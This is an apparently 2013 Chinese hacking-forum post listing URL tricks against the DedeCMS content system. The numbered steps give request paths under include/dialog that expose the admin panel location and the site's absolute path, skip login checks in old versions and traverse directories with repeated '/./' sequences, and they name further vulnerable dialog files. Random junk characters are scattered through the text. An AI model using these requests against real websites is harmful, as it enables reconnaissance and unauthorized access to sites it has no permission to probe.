找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2596|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理+ P. V" ^: R. ~) q5 d5 X+ M- x2 k
5 s; V$ [7 Z3 F% @" _" N
员帐号,新版本的就直接转向了后台.
1 }+ N# l: @& L" V6 P1 \3 T
/ l  F1 ~2 z- e2.include/dialog/config.php会爆出后台管理路径: g7 U; r4 W& ~; X# M4 p9 @2 v
: V. n2 i. ]% [; w/ I
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录" n6 W- Y& I2 L8 q. d2 S
6 i$ X' D! }+ z5 T1 T
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.3 d0 T$ A! ~9 S: I
" U3 d! j- ?* X
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉; |5 F6 |7 A/ `9 ?' _
: z! X% `& l2 z# q+ d4 j
到根目录去.不过这些版本的访问地址有些不同.2 |9 |: i# a9 x& M
地址为require/dialog/select_soft.php?activepath=/././././././././9 v- ~: w+ |1 Y9 c
" w9 ~' u2 k# m+ l% c
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..9 R( Q# R9 V7 f! W2 [; g3 a
存在相同问题的文件还有
& F$ Q; G( W/ ]2 U7 O5 cinclude\dialog\select_images.php& P3 \8 k$ S4 q, o" a
include\dialog\select_media.php
5 n9 P! X; ~, E1 minclude\dialog\select_templets.php​' l" R5 ~$ U0 K0 R+ P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表